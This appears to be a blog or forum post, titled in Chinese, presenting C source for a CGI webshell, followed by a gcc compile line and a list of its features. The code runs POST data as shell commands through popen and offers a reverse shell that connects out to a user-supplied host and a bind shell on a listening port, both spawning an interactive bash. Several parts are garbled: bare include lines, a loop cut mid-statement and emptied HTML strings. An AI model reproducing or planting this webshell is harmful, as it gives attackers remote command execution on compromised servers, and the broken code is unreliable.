C语言实现cgi webshell
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct get_data {
char key[100];
char value[100];
};
void exec_cmd(void){
printf("Content-type:text/html\n\n");
FILE *command;
int size = atoi(getenv("CONTENT_LENGTH"));
if(size > 1500) {
printf("Error> Post Data is very big");
exit(0);
}
char *buffer = malloc(size+1);
fread(buffer,1,size,stdin);
command = popen(buffer,"r");
char caracter;
while((caracter = fgetc(command))){
if(caracter == EOF) break;
printf("%c",caracter);
}
pclose(command);
free(buffer);
exit(0);
}
int error(char *err){
perror(err);
exit(EXIT_FAILURE);
}
void parser_get(void){
printf("Content-type:text/html\n\n");
struct get_data *s;
char *GET = (char *)getenv("QUERY_STRING");
int i,number_of_get = 0,size_get = strlen(GET);
if(strlen(GET) > 100)
exit(0);
s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
int element = 0;
int positionA = 0;
int positionB = 0;
int id = 0;
for(i=0;i 65535){
printf("Something is wrong ... !!!");
free(type_x);
free(host_x);
exit(0);
}
if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
printf("You must specify a target host ...");
free(type_x);
free(host_x);
exit(0);
}
if(strcmp(type_x,"reverse") == 0){
struct sockaddr_in addr;
int msocket;
msocket = socket(AF_INET,SOCK_STREAM,0);
if(msocket < 0){
printf("Fail to create socket");
free(host_x);
free(type_x);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port_x);
addr.sin_addr.s_addr = inet_addr(host_x);
memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
printf("Fail to connect\n");
free(host_x);
free(type_x);
exit(0);
}
printf("Connect with sucess !!!\n");
if(fork() == 0){
close(0); close(1); close(2);
dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
execl("/bin/bash","bash","-i", (char *)0);
close(msocket);
exit(0);
}
free(host_x);
free(type_x);
exit(0);
} else if (strcmp(type_x,"bind")==0) {
int my_socket, cli_socket;
struct sockaddr_in server_addr,cli_addr;
if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("Fail to create socket");
exit(1);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port_x);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
int optval = 1;
setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
printf("Fail to bind");
free(host_x);
free(type_x);
exit(1);
}
if (listen(my_socket, 1) < 0){
printf("Fail to listen");
free(host_x);
free(type_x);
exit(1);
} else {
printf("Listen on port %d\n",port_x);
}
if(fork() == 0){
socklen_t tamanho = sizeof(struct sockaddr_in);
if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
exit(0);
}
close(0); close(1); close(2);
dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
execl("/bin/bash","bash","-i",(char *)0);
close(cli_socket);
}
}
free(host_x);
free(type_x);
exit(0);
}
void load_css_js(void){
printf("\n\
\n\
");
}
int main(void){
if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
printf("Content-type:text/html\n\n");
printf("\n");
printf("\t\n\t\n");
printf("\t\t C CGI SHELL =D \n");
load_css_js();
printf("\n\t\n");
printf("\t\n");
printf(" \n\
\n\
C - CGI SHELL
C0d3r: webshell | REVERSE/BIND
\n\
\n\
\n\
\n\
\n\
\n\
\n\
Reverse Connection: Stop
\n\
\n\
\n\
\n\
\n\
\n\
Bind Connection: Stop
\n\
\n\
\n\
\n\
\n\
\n\
\n\
\n\
");
return 0;
}
编译:
gcc shell.c -o shell.cgi
功能:
1.反弹获得shell(target作为客户端)
2.监听获得shell(target作为服务端)
3.命令行执行
